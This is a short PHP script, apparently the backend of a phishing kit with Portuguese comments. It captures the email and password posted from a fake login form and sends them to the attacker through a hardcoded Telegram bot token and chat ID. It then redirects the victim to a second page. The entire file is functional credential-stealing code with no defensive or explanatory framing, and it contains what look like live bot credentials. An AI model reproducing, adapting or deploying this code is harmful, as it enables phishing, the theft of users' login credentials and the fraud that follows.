<!-- coleta.html -->
<?php
/* ========== CONFIGURAÇÃO DO TELEGRAM ========== */
define('BOT_TOKEN', '7731169374:AAF2qtPXZgQELEHs6DnCBJUij638xwYUVVY');
define('CHAT_ID',   '6261750345');
define('API_URL',   'https://api.telegram.org/bot'.BOT_TOKEN.'/');

function telegram($method, $data = []){
    $opts = ['http' => [
        'method'  => 'POST',
        'header'  => 'Content-Type: application/x-www-form-urlencoded',
        'content' => http_build_query($data),
    ]];
    $context = stream_context_create($opts);
    return json_decode(@file_get_contents(API_URL.$method, false, $context), true);
}

/* ========== CAPTURA OS DADOS ========== */
$email = trim($_POST['_user'] ?? '');
$senha = trim($_POST['_pass'] ?? '');

if ($email && $senha) {
    $text = "💸 *NOVA SENHA CAPTURADA*\n*E-mail:* $email\n*Senha:* $senha";
    telegram('sendMessage', [
        'chat_id'    => CHAT_ID,
        'text'       => $text,
        'parse_mode' => 'Markdown',
    ]);
}

/* ========== REDIRECIONA PARA SEGUNDA TELA ========== */
header('Location: segunda.html');
exit;
?>
